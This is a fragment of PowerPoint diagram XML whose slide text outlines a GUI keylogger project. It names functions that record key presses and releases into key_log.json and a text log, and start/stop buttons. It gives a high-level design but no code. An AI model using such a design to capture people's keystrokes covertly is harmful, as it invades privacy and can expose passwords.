    <dgm:pt modelId="{C8227990-FF43-4EAF-8829-5F312F2847A6}" type="sibTrans" cxnId="{8390B210-CD43-40DD-91A4-16D07A65F011}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1A2C8633-0205-4107-AB87-E89B0524787D}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Json: Used to save the logged keystrokes in JSON format.</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1400" dirty="0">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F6503FD-3789-4FE1-89A0-DCBF6DD03C48}" type="parTrans" cxnId="{30DF4185-6738-4577-B11F-C84D0DE4ABAC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5E4A3944-9527-4567-9500-A0AA4FD88008}" type="sibTrans" cxnId="{30DF4185-6738-4577-B11F-C84D0DE4ABAC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{32A03606-8EC6-4B70-825B-82CC6967C943}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>flag: A boolean flag to manage the state of key press and hold.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" dirty="0">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD0B30AE-AF2D-4E91-BFB0-4934ECABBDCA}" type="parTrans" cxnId="{A1B27340-0EDF-4C6A-AAF0-518C5F6C0558}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5CBC78C9-7435-4339-A1A4-FDB391B3E354}" type="sibTrans" cxnId="{A1B27340-0EDF-4C6A-AAF0-518C5F6C0558}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5E8D91D3-7EE0-431E-B4F4-46D1B12752F4}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>keys: A string to accumulate all keystrokes for logging in a text file.</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1400" dirty="0">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3A6927A4-69B6-4D6F-83C5-EFB45515085A}" type="parTrans" cxnId="{EBD9B269-F876-412F-8278-CC4EBE08F335}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{65D242CA-24DD-4521-84BB-4780D059A334}" type="sibTrans" cxnId="{EBD9B269-F876-412F-8278-CC4EBE08F335}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{92446F52-2A5D-47FA-BB92-1ECADD2BCE55}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>generate_json_file(keys_used): Writes the logged keystrokes to a JSON file (key_log.json).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" dirty="0">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FA0063A5-3138-40B1-AB8C-5355ACA6298C}" type="parTrans" cxnId="{5C8F9757-5DA2-4A02-80F1-4443E70F2155}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{18CAF97A-9FD3-4441-BECE-80A602097E1A}" type="sibTrans" cxnId="{5C8F9757-5DA2-4A02-80F1-4443E70F2155}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4E768723-B704-4903-A024-168EA9A5FD83}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>on_press(key): Handles key press events, updates the keys_used list, and calls generate_json_file.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" dirty="0">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2AF8405A-2A38-48BF-A45F-11341AFD0D6D}" type="parTrans" cxnId="{0578E2C1-A50E-4958-9C76-1A325A00FB11}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C438309D-0AE0-457A-B124-96ED9EF2B50B}" type="sibTrans" cxnId="{0578E2C1-A50E-4958-9C76-1A325A00FB11}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A6F8CFE5-FD32-4ED7-A970-BDD0D153CF91}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>on_release(key): Handles key release events, updates the keys_used list, and calls both generate_json_file and generate_text_log.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" dirty="0">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{74F6514F-53BD-4916-B5A4-5F25B2E135DE}" type="parTrans" cxnId="{622CA3E4-5378-4B72-A6CC-28FF982065F9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB252C6B-E3D2-4E47-8A10-BAA742BCDB1A}" type="sibTrans" cxnId="{622CA3E4-5378-4B72-A6CC-28FF982065F9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E8AB2E33-A8D1-4ED7-B8C8-DE269FCDD812}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>start_keylogger(): Initializes and starts the keylogger, updates the GUI to reflect the keylogger's running state.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" dirty="0">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EF966BDE-CE7B-4391-9351-3E9D8285A78A}" type="parTrans" cxnId="{5D189D83-FCAA-41E0-8B3D-C4A3EE525071}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1FB04D60-A1C7-474C-9947-97ACD48AE599}" type="sibTrans" cxnId="{5D189D83-FCAA-41E0-8B3D-C4A3EE525071}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FAC6CC07-A3C3-4902-B971-16F5CB0D965A}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>stop_keylogger(): Stops the keylogger and updates the GUI to reflect the keylogger's stopped state.</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1400" dirty="0">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB692DB9-97B5-44A0-AF8D-6AC312C3F477}" type="parTrans" cxnId="{184787AF-AF71-4B07-87E2-4BD21D684BB7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0675E102-0B51-4AA5-9B80-9442F770FB8C}" type="sibTrans" cxnId="{184787AF-AF71-4B07-87E2-4BD21D684BB7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{053DDB1A-AB00-4089-BF0D-3812933D8670}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>4.GUI Components</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" dirty="0"/>
            <a:t>:</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A7B23EA6-53F0-455E-9A6C-930B021F6F49}" type="parTrans" cxnId="{23DAD860-FC6A-49F4-BDD8-FF6D3B7A4FCB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F3EB5C9D-B5E4-40AC-A2C0-2656332743FF}" type="sibTrans" cxnId="{23DAD860-FC6A-49F4-BDD8-FF6D3B7A4FCB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{909144A6-0A0B-4AE5-8249-0A95E7EB4A5C}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Label: Displays messages to the user about the keylogger’s state.</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1400" dirty="0">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5F2B7D1A-C9A0-439B-9007-84660FFFA4A9}" type="parTrans" cxnId="{FE20D781-BA5E-42D5-9B7C-84DE647AE8A2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{48631948-48A9-4234-9F63-630ECAC1396F}" type="sibTrans" cxnId="{FE20D781-BA5E-42D5-9B7C-84DE647AE8A2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{24D89EF5-3DDC-415F-9EC3-0AB0243D75D1}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Button: Two buttons to start and stop</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="1400" dirty="0">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA2F2F77-1CE0-495C-A644-44816D7906B8}" type="parTrans" cxnId="{D5F07F53-A018-4179-A014-2B4ADE4D48B5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A3AAA5AA-8ED3-4D5F-A31E-CC51E37EB787}" type="sibTrans" cxnId="{D5F07F53-A018-4179-A014-2B4ADE4D48B5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ECE5F9FA-5510-4E3C-B784-01CFF45D8B49}" type="pres">
      <dgm:prSet presAssocID="{A490B8E1-BECA-40E2-B443-CC2EB583F086}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{357F28AF-FAD5-4BF0-8228-3898BDE48F5D}" type="pres">
      <dgm:prSet presAssocID="{4780940B-923C-4778-931B-DA50DF0E44A6}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{555385C0-CD6A-4D3D-A231-E0D94107ABDB}" type="pres">
      <dgm:prSet presAssocID="{4780940B-923C-4778-931B-DA50DF0E44A6}" presName="parentText" presStyleLbl="alignNode1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{62BFA832-8A1D-46BD-8840-16CF606227EE}" type="pres">
      <dgm:prSet presAssocID="{4780940B-923C-4778-931B-DA50DF0E44A6}" presName="descendantText" presStyleLbl="alignAcc1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CAF66E0C-0559-47A4-AFBD-DCF12794F93A}" type="pres">
      <dgm:prSet presAssocID="{8FED9F2E-B73E-4847-B1A9-4DE9AE5280C1}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7D124873-C7D4-442D-8A06-F2D2ED18C958}" type="pres">
      <dgm:prSet presAssocID="{F016D6A4-F0D1-44E6-A9C1-4397386AEC60}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{38638AFD-E64D-4984-AF82-861D40FD21A1}" type="pres">
      <dgm:prSet presAssocID="{F016D6A4-F0D1-44E6-A9C1-4397386AEC60}" presName="parentText" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1E83BB1E-9F54-4A93-B6D6-4241384B78A3}" type="pres">
      <dgm:prSet presAssocID="{F016D6A4-F0D1-44E6-A9C1-4397386AEC60}" presName="descendantText" presStyleLbl="alignAcc1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{714CDA00-07F6-4272-B003-608ADE55FBBF}" type="pres">
      <dgm:prSet presAssocID="{1E209288-2789-4D00-B8B7-4A7DC4318AF2}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F342BE25-4C0E-49B0-AEEC-0AEC2A572FC4}" type="pres">
      <dgm:prSet presAssocID="{E1F47546-0038-4E34-8235-DB4E120A8819}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9A38E2D1-D590-4467-8968-9CD0FFCA7F83}" type="pres">
      <dgm:prSet presAssocID="{E1F47546-0038-4E34-8235-DB4E120A8819}" presName="parentText" presStyleLbl="alignNode1" presStyleIdx="2" presStyleCnt="4" custLinFactNeighborX="-1590" custLinFactNeighborY="-25300">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{500CFD40-23FE-4DD1-B3ED-76499482957A}" type="pres">
      <dgm:prSet presAssocID="{E1F47546-0038-4E34-8235-DB4E120A8819}" presName="descendantText" presStyleLbl="alignAcc1" presStyleIdx="2" presStyleCnt="4" custScaleX="99650" custScaleY="243423" custLinFactNeighborX="8" custLinFactNeighborY="3506">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B9A7C00C-AB16-4ED0-A74D-E24ED2C1F13E}" type="pres">
      <dgm:prSet presAssocID="{1B5977E2-D5ED-4B03-BCA3-8B18E14CF84D}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4C3474FC-BFA5-44CA-AF21-A35156CFB9A2}" type="pres">
      <dgm:prSet presAssocID="{053DDB1A-AB00-4089-BF0D-3812933D8670}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3D6B3199-C9BC-4A59-9AC4-2B4E7EDED6CC}" type="pres">
      <dgm:prSet presAssocID="{053DDB1A-AB00-4089-BF0D-3812933D8670}" presName="parentText" presStyleLbl="alignNode1" presStyleIdx="3" presStyleCnt="4" custLinFactNeighborX="0" custLinFactNeighborY="26021">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ECF9FEDD-7A02-4D67-AC3E-D8DC933BA48C}" type="pres">
      <dgm:prSet presAssocID="{053DDB1A-AB00-4089-BF0D-3812933D8670}" presName="descendantText" presStyleLbl="alignAcc1" presStyleIdx="3" presStyleCnt="4" custLinFactNeighborX="0" custLinFactNeighborY="41428">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{8390B210-CD43-40DD-91A4-16D07A65F011}" srcId="{4780940B-923C-4778-931B-DA50DF0E44A6}" destId="{3BE6992C-6AD3-486B-9320-C83FA1B633C5}" srcOrd="1" destOrd="0" parTransId="{17FE506C-C0F5-4B8B-A5DF-168F6D43144F}" sibTransId="{C8227990-FF43-4EAF-8829-5F312F2847A6}"/>
    <dgm:cxn modelId="{27F75817-04EB-4344-AC9F-E2357D20F27D}" type="presOf" srcId="{A490B8E1-BECA-40E2-B443-CC2EB583F086}" destId="{ECE5F9FA-5510-4E3C-B784-01CFF45D8B49}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{D2A11E25-D4D7-4818-A62A-CFBDD2EE633D}" srcId="{A490B8E1-BECA-40E2-B443-CC2EB583F086}" destId="{F016D6A4-F0D1-44E6-A9C1-4397386AEC60}" srcOrd="1" destOrd="0" parTransId="{8C3ABE91-4711-4952-BA95-D68DA402F924}" sibTransId="{1E209288-2789-4D00-B8B7-4A7DC4318AF2}"/>
    <dgm:cxn modelId="{5FA3092F-5397-45A6-93DC-90E70E315015}" srcId="{A490B8E1-BECA-40E2-B443-CC2EB583F086}" destId="{E1F47546-0038-4E34-8235-DB4E120A8819}" srcOrd="2" destOrd="0" parTransId="{3B291FE7-7E4E-46CF-BC93-9585970DC962}" sibTransId="{1B5977E2-D5ED-4B03-BCA3-8B18E14CF84D}"/>
    <dgm:cxn modelId="{6B13063C-85E1-4E59-A943-FF265B823758}" srcId="{F016D6A4-F0D1-44E6-A9C1-4397386AEC60}" destId="{1F51DD1D-47FA-4C0D-92F5-B48A2892A005}" srcOrd="0" destOrd="0" parTransId="{7A6286B7-B2AB-404B-A061-0EB73C99DA88}" sibTransId="{CE8B9346-1891-4138-A2D2-85B21D39A5D1}"/>
    <dgm:cxn modelId="{9508CE3E-2DBB-4C17-8889-0C9AD9A66932}" type="presOf" srcId="{E8AB2E33-A8D1-4ED7-B8C8-DE269FCDD812}" destId="{500CFD40-23FE-4DD1-B3ED-76499482957A}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2"/>
    <dgm:cxn modelId="{A1B27340-0EDF-4C6A-AAF0-518C5F6C0558}" srcId="{F016D6A4-F0D1-44E6-A9C1-4397386AEC60}" destId="{32A03606-8EC6-4B70-825B-82CC6967C943}" srcOrd="1" destOrd="0" parTransId="{AD0B30AE-AF2D-4E91-BFB0-4934ECABBDCA}" sibTransId="{5CBC78C9-7435-4339-A1A4-FDB391B3E354}"/>
    <dgm:cxn modelId="{B95A625F-24DA-4550-90F3-27C2ABEB8FEB}" srcId="{4780940B-923C-4778-931B-DA50DF0E44A6}" destId="{401540F2-3546-4794-BEAD-60CA708BBAB6}" srcOrd="0" destOrd="0" parTransId="{54B4A0DD-5C6D-4486-8FD8-8CAA3C76CB65}" sibTransId="{6DFD1F17-3FD3-401A-8A69-361AC873BE83}"/>
    <dgm:cxn modelId="{23DAD860-FC6A-49F4-BDD8-FF6D3B7A4FCB}" srcId="{A490B8E1-BECA-40E2-B443-CC2EB583F086}" destId="{053DDB1A-AB00-4089-BF0D-3812933D8670}" srcOrd="3" destOrd="0" parTransId="{A7B23EA6-53F0-455E-9A6C-930B021F6F49}" sibTransId="{F3EB5C9D-B5E4-40AC-A2C0-2656332743FF}"/>
    <dgm:cxn modelId="{EBD9B269-F876-412F-8278-CC4EBE08F335}" srcId="{F016D6A4-F0D1-44E6-A9C1-4397386AEC60}" destId="{5E8D91D3-7EE0-431E-B4F4-46D1B12752F4}" srcOrd="2" destOrd="0" parTransId="{3A6927A4-69B6-4D6F-83C5-EFB45515085A}" sibTransId="{65D242CA-24DD-4521-84BB-4780D059A334}"/>
